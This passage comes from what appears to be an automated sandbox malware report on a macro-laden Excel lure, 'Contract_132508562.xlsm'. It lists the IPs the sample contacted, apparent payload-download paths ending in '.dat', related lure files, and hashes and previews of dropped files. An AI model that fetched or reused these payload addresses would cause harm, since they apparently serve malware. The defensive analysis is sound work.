                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                                  high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  83.136.232.110
                                                                                                                                                  unknownRussian Federation
                                                                                                                                                  31326MTR-SVIAZ-ASRUfalse
                                                                                                                                                  190.14.37.247
                                                                                                                                                  unknownPanama
                                                                                                                                                  52469OffshoreRacksSAPAfalse
                                                                                                                                                  185.212.131.194
                                                                                                                                                  unknownGermany
                                                                                                                                                  200313INTERNET-ITNLfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                  Analysis ID:382682
                                                                                                                                                  Start date:06.04.2021
                                                                                                                                                  Start time:14:03:00
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 25s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:Contract_132508562.xlsm
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:21
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • GSI enabled (VBA)
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal72.expl.evad.winXLSM@7/9@0/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsm
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.82.209.183, 204.79.197.200, 13.107.21.200, 13.88.21.125, 13.64.90.137, 92.122.145.220, 52.109.88.177, 52.109.76.33, 52.109.8.24, 104.43.193.48, 104.42.151.234, 40.88.32.150, 52.155.217.156, 20.54.26.129, 93.184.221.240, 92.122.213.194, 92.122.213.247, 52.147.198.201, 168.61.161.212
                                                                                                                                                  • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  83.136.232.110Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110/44285,5327891204.dat
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110/44285,5327891204.dat
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110/44285,5327891204.dat
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110/44285,5327891204.dat
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110/44285,5327891204.dat
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110/44285,5327891204.dat
                                                                                                                                                  190.14.37.247Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247/44285,5327891204.dat
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247/44285,5327891204.dat
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247/44285,5327891204.dat
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247/44285,5327891204.dat
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247/44285,5327891204.dat
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247/44285,5327891204.dat
                                                                                                                                                  185.212.131.194Contract_132508562.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194/44285,5327891204.dat
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194/44285,5327891204.dat
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194/44285,5327891204.dat
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194/44285,5327891204.dat
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194/44285,5327891204.dat
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194/44285,5327891204.dat
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194/44285,5327891204.dat

                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  OffshoreRacksSAPAContract_132508562.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.247
                                                                                                                                                  11CONFIDENTIAL APPROVED ACCOUNTS.exeGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.240
                                                                                                                                                  61REQUEST FOR QUOTATION.DOCGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.168
                                                                                                                                                  6P.O 3500046.DOCGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.168
                                                                                                                                                  4711150874.DOCGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.168
                                                                                                                                                  57New Order.DOCGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.168
                                                                                                                                                  4610798560.DOCGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.168
                                                                                                                                                  3206589117.DOCGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.168
                                                                                                                                                  38179851662.DOCGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.168
                                                                                                                                                  26PO140855DW.docGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.168
                                                                                                                                                  47407895069.DOCGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.168
                                                                                                                                                  43Amendment for attached P.O quanties.exeGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.240
                                                                                                                                                  30610750398.DOCGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.168
                                                                                                                                                  27260974117.DOCGet hashmaliciousBrowse
                                                                                                                                                  • 181.174.166.168
                                                                                                                                                  INTERNET-ITNLContract_132508562.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.194
                                                                                                                                                  Closure TP-Stamp.htmGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.131.109
                                                                                                                                                  audio.htmGet hashmaliciousBrowse
                                                                                                                                                  • 45.88.3.244
                                                                                                                                                  AxR7BY4wzz.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.128.49
                                                                                                                                                  SecuriteInfo.com.Trojan.Siggen12.41502.7197.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.128.49
                                                                                                                                                  #Ud83d#Udcde Ensono.com AudioMessage_63-19716.htmGet hashmaliciousBrowse
                                                                                                                                                  • 45.88.3.239
                                                                                                                                                  #Ud83d#Udcde Herbalife.com AudioMessage_50-74981.htmGet hashmaliciousBrowse
                                                                                                                                                  • 45.88.3.239
                                                                                                                                                  255423.jhertlein.255423.htmGet hashmaliciousBrowse
                                                                                                                                                  • 45.133.203.92
                                                                                                                                                  JAN Purchase Order.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.128.102
                                                                                                                                                  CMA 20210901-77886000988799908770998778.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.128.102
                                                                                                                                                  SecuriteInfo.com.Trojan.Siggen6.55368.3108.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.128.102
                                                                                                                                                  cpvAcIX9M6.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.128.102
                                                                                                                                                  7de1ZSY0nI.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.128.102
                                                                                                                                                  P8VP61nYPo.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.212.128.102
                                                                                                                                                  MTR-SVIAZ-ASRUContract_132508562.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110
                                                                                                                                                  Contract_657752239.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110
                                                                                                                                                  Contract_1836733707.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 83.136.232.110

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\8774CB2F-B9EB-437C-9D99-9955AED5AE53
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):133170
                                                                                                                                                  Entropy (8bit):5.3709999809977225
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:/cQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:jVQ9DQW+zTXiJ
                                                                                                                                                  MD5:1D8711CF8552DDCAEDE729736FED2FF3
                                                                                                                                                  SHA1:CD669D92519A8C4DB3F9FADEA04CA044F328B984
                                                                                                                                                  SHA-256:8A638D470887ECE1978721A244EAEF9363F10B9C14D1110C8B66EB73BCF27EC6
                                                                                                                                                  SHA-512:0F1CD7600DC6A47AEB4D8C07543BA429289ACB0968352E03AD7D0BC058842C9104EFD9BB7998B61F1FF8D80CD7C97A1B9B8C610ADF361EA748677E56D8CDBB6F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-06T12:03:48">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1212CD17.gif
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:GIF image data, version 89a, 1600 x 1600
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):158055
                                                                                                                                                  Entropy (8bit):7.981278766139217
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:4XE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGq:AE5SDvbXAyHbVt15wTQDl
                                                                                                                                                  MD5:CB67CED3017DF7803FBA5D86FCEB4276
                                                                                                                                                  SHA1:C7B8B4A44BDF7F7775F61FCF236A0834CB321733
                                                                                                                                                  SHA-256:C31F711B323EA0B1D04C7A72ECAC0BBBF4DC4ECC56F837FEFE754F53385D07B1
                                                                                                                                                  SHA-512:1E70FD6101A50A0AEDFF22C2DB22A5FB4E063C02E6C062097A973FED663E6623BDA2FFA33B266001AB99BA5AA945FA51C1571C553015C8F8633D68BFA7F663D1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: GIF89a@.@.p..!.......,....@.@.......3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................y..Hp.....*L.p....J.Hq.../j..q.. ?..Ir..(O.L.r..0_.Is...=...y.M..@y.....O.>......D...z.h.L.<e...6..tm....9.......Y.d..]....h...V._.^...kv-.e...6...i.>N..1....C....d.n.}..,..bM_.<:.h.
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\D5A40000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):180798
                                                                                                                                                  Entropy (8bit):7.963891127920898
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:0Kred2gBXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDG4:7CIME5SDvbXAyHbVt15wTQDN
                                                                                                                                                  MD5:EB13132E9B800E217E1488203705F97E
                                                                                                                                                  SHA1:DD0B630084DA4602009B0D4DABB1467A256FBAA5
                                                                                                                                                  SHA-256:5201033FDF62A824442E97628D74442CCDC6D10A0AA572A6E99A6B60E3522B77
                                                                                                                                                  SHA-512:430A21243E67C821597738ABFF3F91FDA6CA6648574AC0C4AD2844D83B3FC3DCB9F59FB81AA2FBB0EEBF3E6A112CA55D657A8A038CC4BD770D1E9C1764292D10
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: .U.n.0....?..."..(..r.mzl.$...\I....8..wI;N.....E/jgvv.......BT.6.NH.V8.l._......[...5Dr3{.n....+...!}J..cQ.`x..........y....v=.|b...6.)c......Q..v..7..%......!.{..O.([Z...vm..H'..B...p.{.d4.A!c...PX$l/g...nUQ.,..^.....`.'.U...T.&N.\........%...!.....V.=...;...is1M.a%@.R1j......<..>k:.T"#+...(_....e%.xd...).R......%z@.?4.....1.u......\...3P.....Gd.:.....>.-u.O.o.<d.O9..}8..[........D..F...1w..v......G\1..w...st...BR.s.}.c..t.(A^....nV...........PK..........!.x...............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Contract_132508562.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:50 2020, mtime=Tue Apr 6 11:03:51 2021, atime=Tue Apr 6 11:03:51 2021, length=180801, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2200
                                                                                                                                                  Entropy (8bit):4.733951113731611
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8U/GxH1jRa3no9B6pU/GxH1jRa3no9B6:8U/GxH1s3no9KU/GxH1s3no9
                                                                                                                                                  MD5:9520A2F279C3F573B2EB445F5B04A9A6
                                                                                                                                                  SHA1:D53F3F3B8A7466393F0DD1C250BFF419C404BC08
                                                                                                                                                  SHA-256:7D9536A739DBD26F68CF1A672DE1F5AA891F288D2BA56BB866B64637098C14E0
                                                                                                                                                  SHA-512:3C87C849AD921B70D0D22830C6F7BFF310441D309B857A5A5E93C10ED5C0F8D3CC0CDD3170C3B2D559FF74017855E10BF7E136053FD8A6A7C7F10C6BB33EC078
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: L..................F.... ......Q........*......*..A............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Rp`....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N...Rp`....#J....................o...j.o.n.e.s.....~.1.....>Q|<..Desktop.h.......N...Rp`.....Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2......Ru` .CONTRA~1.XLS..`......>Qz<.Ru`.....V.....................o..C.o.n.t.r.a.c.t._.1.3.2.5.0.8.5.6.2...x.l.s.m.......]...............-.......\...........>.S......C:\Users\user\Desktop\Contract_132508562.xlsm........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.n.t.r.a.c.t._.1.3.2.5.0.8.5.6.2...x.l.s.m.........:..,.LB.)...As...`.......X.......887849...........!a..%.H.VZAj...r................!a..%.H.VZAj...r...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue Apr 6 11:03:51 2021, atime=Tue Apr 6 11:03:51 2021, length=8192, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):904
                                                                                                                                                  Entropy (8bit):4.680672472697789
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:8yvKXU1duCH2POdPWLhg+WrjAZ/DYbDKwXpSeuSeL44t2Y+xIBjKZm:8c//caAZbcDKw7aB6m
                                                                                                                                                  MD5:0A98BC9C1E1DE987BF27B99E5FB02D95
                                                                                                                                                  SHA1:4404AB19E3AB509F7EB5D5E6876C66999F4DC251
                                                                                                                                                  SHA-256:623DFF10C18C8A457919E157AAF051DAA2070195DF22AAF01CE1189D83FD9CB1
                                                                                                                                                  SHA-512:D0845F5F3C270B916B3CF402606CBDD374F3F29BF2160EA536971140F94DA5F2379E4337D74055A44F28B7F4A10B5B576AA6A0EC530A4D65E1ED95D30FF293C6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: L..................F.............-......*......*... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Rp`....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N...Rp`....#J....................o...j.o.n.e.s.....~.1......Rz`..Desktop.h.......N...Rz`.....Y..............>.......Q.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......887849...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):109
                                                                                                                                                  Entropy (8bit):4.781940430995407
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:oyBVomxWt7Gc1TXLUl+EUGc1TXLUlmxWt7Gc1TXLUlv:djeCQTXLUdQTXLUzCQTXLU1
                                                                                                                                                  MD5:2747EA491ECD274541188B946DBEAD52
                                                                                                                                                  SHA1:2A2A3512122B2BD922198D13BAF6553133070B9B
                                                                                                                                                  SHA-256:1AE9A2620049FE85A0455585E86DF191D62B6BA603C97E3E98949575178C02EC
                                                                                                                                                  SHA-512:F6332A74651850286C30BD107B45D1FE1F6D9A49065EFF2E5212743C26E193924856C9F7A5702C37FBFC824CF6765488082D7A274E53F709620938CE463E1595
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: Desktop.LNK=0..[misc]..Contract_132508562.LNK=0..Contract_132508562.LNK=0..[misc]..Contract_132508562.LNK=0..
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):22
                                                                                                                                                  Entropy (8bit):2.9808259362290785
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                  C:\Users\user\Desktop\76A40000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):180801
                                                                                                                                                  Entropy (8bit):7.963796897671952
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:VKrct+BXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGs:cLE5SDvbXAyHbVt15wTQD9
                                                                                                                                                  MD5:B70654EA3405E4B6B4F93036020029B1
                                                                                                                                                  SHA1:B4277D445A51DEBB9A4968FA1E281887D6B4B45A
                                                                                                                                                  SHA-256:D5063C67874336ADDDC8A44B3B502A38B066AED4D44F2F1FE5EA98FD122F1804
                                                                                                                                                  SHA-512:C133637DB17A0A8FB792FCC548635757AC8F9717DF59A6AE96F19FABE4EA2DAD0913E2603CE22392838E8538DAEA6A487A85A6967CACD6CC4F52FF9B7C01F404
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: .U.n.0....?..."..(..r.mzl.$...\I....8..wI;N.....E/jgvv.......BT.6.NH.V8.l._......[...5Dr3{.n....+...!}J..cQ.`x..........y....v=.|b...6.)c......Q..v..7..%......!.{..O.([Z...vm..H'..B...p.{.d4.A!c...PX$l/g...nUQ.,..^.....`.'.U...T.&N.\........%...!.....V.=...;...is1M.a%@.R1j......<..>k:.T"#+...(_....e%.xd...).R......%z@.?4.....1.u......\...3P.....Gd.:.....>.-u.O.o.<d.O9..}8..[........D..F...1w..v......G\1..w...st...BR.s.}.c..t.(A^....nV...........PK..........!.x...............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
